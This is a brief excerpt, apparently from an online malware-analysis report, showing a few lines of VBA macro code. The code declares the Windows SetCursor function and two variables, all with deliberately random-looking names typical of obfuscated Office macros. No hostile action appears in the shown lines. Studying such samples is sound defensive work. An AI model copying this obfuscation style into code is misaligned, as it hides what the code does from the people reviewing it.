Declare Function SetCursor Lib "user32" (ByVal sfkwhbv3vgoifgw7goig3ori2gwo8rgfwoy3r2f3 As Long) As Long
#End If
Private kn2mn5 As Long
Private xkj23bjhk As Long
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.